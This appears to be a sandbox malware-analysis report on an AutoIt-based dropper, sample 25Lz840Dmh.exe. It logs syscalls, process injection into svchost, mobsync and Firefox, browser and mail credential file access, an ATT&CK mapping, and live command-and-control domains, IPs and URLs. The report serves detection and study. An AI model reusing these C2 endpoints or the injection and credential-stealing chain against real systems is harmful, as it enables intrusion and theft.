Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtNotifyChangeKey: Direct from: 0x77763C2C
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtCreateMutant: Direct from: 0x777635CC
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtResumeThread: Direct from: 0x777636AC
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtProtectVirtualMemory: Direct from: 0x77757B2E
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtQuerySystemInformation: Direct from: 0x77762DFC
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtAllocateVirtualMemory: Direct from: 0x77762BFC
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtReadFile: Direct from: 0x77762ADC
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtDelayExecution: Direct from: 0x77762DDC
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtWriteVirtualMemory: Direct from: 0x7776490C
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtQueryInformationProcess: Direct from: 0x77762C26
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtResumeThread: Direct from: 0x77762FBC
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtCreateUserProcess: Direct from: 0x7776371C
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtAllocateVirtualMemory: Direct from: 0x77763C9C
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtSetInformationThread: Direct from: 0x77762B4C
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtCreateKey: Direct from: 0x77762C6C
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtQuerySystemInformation: Direct from: 0x777648CC
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtOpenSection: Direct from: 0x77762E0C
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtAllocateVirtualMemory: Direct from: 0x77762BEC
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtSetInformationThread: Direct from: 0x77762ECC
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtQueryInformationToken: Direct from: 0x77762CAC
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtTerminateThread: Direct from: 0x77762FCC
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtCreateFile: Direct from: 0x77762FEC
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeThread register set: target process: 1832Jump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeThread APC queued: target process: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 28AC008Jump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2C80008Jump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C487B1 LogonUserW,5_2_00C487B1
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BF3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00BF3B3A
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BF48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00BF48D7
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C54C53 mouse_event,5_2_00C54C53
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\25Lz840Dmh.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe "C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe" Jump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C47CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00C47CAF
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C4874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_00C4874B
                    Source: 25Lz840Dmh.exe, fricandeaus.exe.5.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: 25Lz840Dmh.exe, fricandeaus.exe, LHSqcaLVnKQk.exe, 0000000E.00000000.1773357864.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, LHSqcaLVnKQk.exe, 0000000E.00000002.2541492477.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, LHSqcaLVnKQk.exe, 00000012.00000000.1945191686.0000000001010000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: LHSqcaLVnKQk.exe, 0000000E.00000000.1773357864.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, LHSqcaLVnKQk.exe, 0000000E.00000002.2541492477.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, LHSqcaLVnKQk.exe, 00000012.00000000.1945191686.0000000001010000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: LHSqcaLVnKQk.exe, 0000000E.00000000.1773357864.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, LHSqcaLVnKQk.exe, 0000000E.00000002.2541492477.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, LHSqcaLVnKQk.exe, 00000012.00000000.1945191686.0000000001010000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                    Source: LHSqcaLVnKQk.exe, 0000000E.00000000.1773357864.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, LHSqcaLVnKQk.exe, 0000000E.00000002.2541492477.0000000000F71000.00000002.00000001.00040000.00000000.sdmp, LHSqcaLVnKQk.exe, 00000012.00000000.1945191686.0000000001010000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C1862B cpuid 5_2_00C1862B
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C24E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00C24E87
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C31E06 GetUserNameW,5_2_00C31E06
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C23F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_00C23F3A
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BF49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00BF49A0
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

Source: Yara match File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.1903592884.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1865888843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2542862112.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2539169522.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1866274601.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1866670350.0000000004150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2543006411.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2542692952.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2542858222.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\mobsync.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\mobsync.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\mobsync.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\mobsync.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\mobsync.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\mobsync.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\mobsync.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\mobsync.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\mobsync.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: fricandeaus.exe Binary or memory string: WIN_81
Source: fricandeaus.exe Binary or memory string: WIN_XP
Source: fricandeaus.exe Binary or memory string: WIN_XPe
Source: fricandeaus.exe Binary or memory string: WIN_VISTA
Source: fricandeaus.exe Binary or memory string: WIN_7
Source: fricandeaus.exe Binary or memory string: WIN_8
Source: fricandeaus.exe.5.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                    Remote Access Functionality

Source: Yara match File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.1903592884.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1865888843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2542862112.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2539169522.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1866274601.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1866670350.0000000004150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2543006411.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2542692952.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2542858222.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C66283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 5_2_00C66283
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C66747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 5_2_00C66747
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_00166283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 7_2_00166283
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_00166747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 7_2_00166747
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 111 Scripting | 2 Valid Accounts | 2 Native API | 111 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 2 Valid Accounts | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | 2 Obfuscated Files or Information | NTDS | 117 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 251 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 1 Masquerading | Cached Domain Credentials | 3 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 3 Virtualization/Sandbox Evasion | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 412 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph ID: 1588079 | Sample: 25Lz840Dmh.exe | Startdate: 10/01/2025 | Architecture: WINDOWS | Score: 100
Start (node 2): DNS/IP: www.medicaresbasics.xyz; www.meliorahomes.net; 4 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 6 other signatures. Started: 25Lz840Dmh.exe (node 11); wscript.exe (node 15).
www.medicaresbasics.xyz: Performs DNS queries to domains with low reputation.
25Lz840Dmh.exe (node 11): dropped C:\Users\user\AppData\...\fricandeaus.exe (PE32). Signature: Binary is likely a compiled AutoIt script file. Started: fricandeaus.exe (node 17).
wscript.exe (node 15): Signature: Windows Scripting host queries suspicious COM object (likely to drop second stage). Started: fricandeaus.exe (node 21).
fricandeaus.exe (node 17): dropped C:\Users\user\AppData\...\fricandeaus.vbs (data). Signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; 2 other signatures. Started: svchost.exe (node 23).
fricandeaus.exe (node 21): Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process. Started: svchost.exe (node 26).
svchost.exe (node 23): Signature: Maps a DLL or memory area into another process. Injected: LHSqcaLVnKQk.exe (node 28).
LHSqcaLVnKQk.exe (node 28): Signature: Found direct / indirect Syscall (likely to bypass EDR). Started: mobsync.exe (node 31).
mobsync.exe (node 31): Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures. Injected: LHSqcaLVnKQk.exe (node 34). Started: firefox.exe (node 38).
LHSqcaLVnKQk.exe (node 34): DNS/IP: www.meliorahomes.net 8.217.17.192, ports 50260, 50261, 50262, CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC, Singapore; arcare.partners 3.33.130.190, ports 50255, 50256, 50257, AMAZONEXPANSIONGB, United States. Signature: Found direct / indirect Syscall (likely to bypass EDR).

Source | Detection | Scanner | Label | Link
25Lz840Dmh.exe | 74% | ReversingLabs | Win32.Worm.AutoRun |
25Lz840Dmh.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | 74% | ReversingLabs | Win32.Worm.AutoRun |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.arcare.partners/0w45/?A2jpdtl=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LRAA95+SEq5JDEdJFd3pplmYx68eY/xBqA0qg2DYtg7eqCiJgDt7nHqi&7pG=BhQ41 | 100% | Avira URL Cloud | malware |
http://www.meliorahomes.net/ir1u/ | 0% | Avira URL Cloud | safe |
http://www.medicaresbasics.xyz/fm31/ | 0% | Avira URL Cloud | safe |
http://www.meliorahomes.net | 0% | Avira URL Cloud | safe |
http://www.medicaresbasics.xyz/fm31/?A2jpdtl=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdr/94mhxusDM5hNFGf0PVpNjy7oFhBMR3vaflGDOrcFhaSuJTiwDMWUm&7pG=BhQ41 | 0% | Avira URL Cloud | safe |
http://www.meliorahomes.net/ir1u/?A2jpdtl=uYKfOYzDqyqggai79vqScpm8ne5FVijKNd4332x8Wl1jbLzIat8ECGM70iN++AMSU9cBnLmC3wIu2ItfOOX8692jDlyWN1SxZ5RFi5r2IKL+fn6lY/Px6jUTLMjhswDg2fu7McASOoW2&7pG=BhQ41 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
medicaresbasics.xyz | 3.33.130.190 | true | true | | unknown
arcare.partners | 3.33.130.190 | true | true | | unknown
www.meliorahomes.net | 8.217.17.192 | true | true | | unknown
www.resellnexa.shop | unknown | unknown | false | | unknown
www.medicaresbasics.xyz | unknown | unknown | true | | unknown
www.arcare.partners | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.medicaresbasics.xyz/fm31/ | true | Avira URL Cloud: safe | unknown
http://www.meliorahomes.net/ir1u/ | true | Avira URL Cloud: safe | unknown
http://www.meliorahomes.net/ir1u/?A2jpdtl=uYKfOYzDqyqggai79vqScpm8ne5FVijKNd4332x8Wl1jbLzIat8ECGM70iN++AMSU9cBnLmC3wIu2ItfOOX8692jDlyWN1SxZ5RFi5r2IKL+fn6lY/Px6jUTLMjhswDg2fu7McASOoW2&7pG=BhQ41 | true | Avira URL Cloud: safe | unknown
